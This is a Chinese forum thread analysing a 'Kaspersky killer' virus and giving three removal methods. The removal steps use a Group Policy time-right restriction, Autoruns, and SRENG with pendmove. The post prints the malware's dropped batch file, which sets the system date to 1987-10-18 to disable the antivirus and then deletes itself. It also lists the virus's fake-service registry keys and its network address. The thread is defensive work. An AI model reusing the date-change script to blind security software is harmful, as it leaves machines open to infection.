卡巴杀手：系统时间改为1987年10月18日，三个解决方法

sex123

对于这个病毒,我想可能是它的作者是1987年出生的,所以把系统时间改为这个.
这个病毒没有直接结束杀软(如卡巴)的进程,而是通过修改系统时间使他们自身产生服务时间的冲突而无法正常工作,是个非常新颖的思路.

有三个解决方法：

第一个方法：

这种方法比较简单，就是让任何人都没有权限更改系统时间。

第一步：打开组策略
　　打开“开始菜单”中的“运行”程序，在其中输入“gpedit.msc”单击确定，进入组策略。

第二步：在组策略中删除所有具有可以更改系统时间的用户名。
　　进入组策略后，在左侧的树形菜单中逐级依次进入“计算机配置、windows设置、安全设置、本地策略、用户权利指派”，然后再右边窗口中找到“更改系统时间”，双击后会弹出“系统时间选项 属性”对话框，在对话框中所罗列的所有用户名全部删除。





这里有Adminstrators和Power Users两个用户，应全部删除。

第三步：全部删除后，单击确定并重新启动计算机

　　这些都做完之后，如果还担心我们这种方法是否成功。我们可以在任务栏中双击时间，或者在控制面板中选择“时间或日期”，或在DOS中试图修改时间，但是都会被告知没有权限修改时间。从而能得出我们所做的努力是成功的。

　　其实这种方法也不是真正意义上的查杀，而仅仅是一种应付的对策。目前似乎卡巴斯基对此病毒还不能查杀，因此卡巴斯基的用户除了定期升级病毒库之外，还要注意我们的系统时间。因为卡巴斯基的授权文件是以时间来做限定的。希望网友们不要同我一样中招，不然在卡巴斯基停止工作的间隔，就会被病毒感染，然而爆发时间和形式却是未知。


第二个方法：

先看看样本动作

判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat

文件内容：
[Copy to clipboard]
CODE:
@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0

=>将系统时间调整为1987-10-18
卡巴的监控立刻失效
成功完成K.O.卡巴后

---------------------------------------------------------------------------------------------
以下为所有机子状况
释放文件
%SystemRoot%\system32\
*
.EXE
%SystemRoot%\system32\
*
T.EXE
%SystemRoot%\system32\
*
.DLL
%SystemRoot%\system32\delme.bat
*

=随机8位字母(如7F9DE518\312E0FDA)
注册表变化

添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"DisplayName" =
*
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"Description" = 为系统提供加速启动功能(d-sp1)。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"ErrorControl" = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"ImagePath" = C:\WINDOWS\System32\
*
-service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"ObjectName" = LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"Start" = [REG_DWORD, value: 00000002]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
*
"Type" = [REG_DWORD, value: 00000010]
=>sreng显示
[
*
/
*
][Running/Auto Start]
  
%SystemRoot%\system32\
*
.EXE
链接网络
地址:61.139.126.62
端口:80


解决方案

1.重启进去安全模式

2.使用Autoruns(下载地址:http://www.skycn.com/soft/17567.html#download)

打开Autoruns->点击Sevices->对Sevices下的8位字母->右键->Verify(认证)->很容易判断出哪个是病毒文件

(Not Verify)Microsoft Corporation------------------------->

3.记住路径 和 文件名

4.继续用Autoruns 右键点击病毒文件 -> Delecte

5.找到刚记下的目录,删除
c:\windows\system32\
*
.EXE
c:\windows\system32\
*
T.EXE
c:\windows\system32\
*
.DLL
6.如果是卡巴的用户 时间被改到1987-10-18自己手动改回来即可



第三个方法：

用曾经是微软MVP(微软最有价值专家)开发的两个软件,一个是System Repair Engineer,下载地址:http://www.kztechs.com/sreng/download.html
还有一个是pendmove,下载地址:http://www.kztechs.com/pendmove/index.html

打开SRENG,依次点击左边的"启动项目","服务"选项卡,选择"win32 服务应用程序",屏幕上就会显示当前系统的所有存在的服务列表,然后在"隐藏已认证的微软项目"前打上勾,就可以看到当前系统非微软自带的服务列表,接下来要做的就是找到病毒所启用的服务,选中可以服务后,点击"删除",接着按"设置"(注意:接着跳出来的提示框你要选择"否"才能删除.)

接着打开pendmove,依照病毒服务上的文件所在目录删除病毒文件,这里需要注意的是我删的时候一共有三个文件名差不多的文件,大家删除的时候注意为了以防万一也要把文件名相似的几个文件也删除,pendmove的使用方法打开工具也可以看到.完成了以上的步骤,就可以重启了,重启后马上使用右键点击IE选择属性,把主页改为空白页(这里千万要注意不要双击打开IE再设置空白页,原因大家也应该明白了)

补充一下,删除病毒文件的时候要把隐藏操作系统文件,隐藏文件等等都关闭,在文件夹选项里.

xcdx

我都是改的时间,呵呵

zhansh

原来卡巴杀手都出来了，不过我用的江民

wxs123

学习 谢谢楼主分享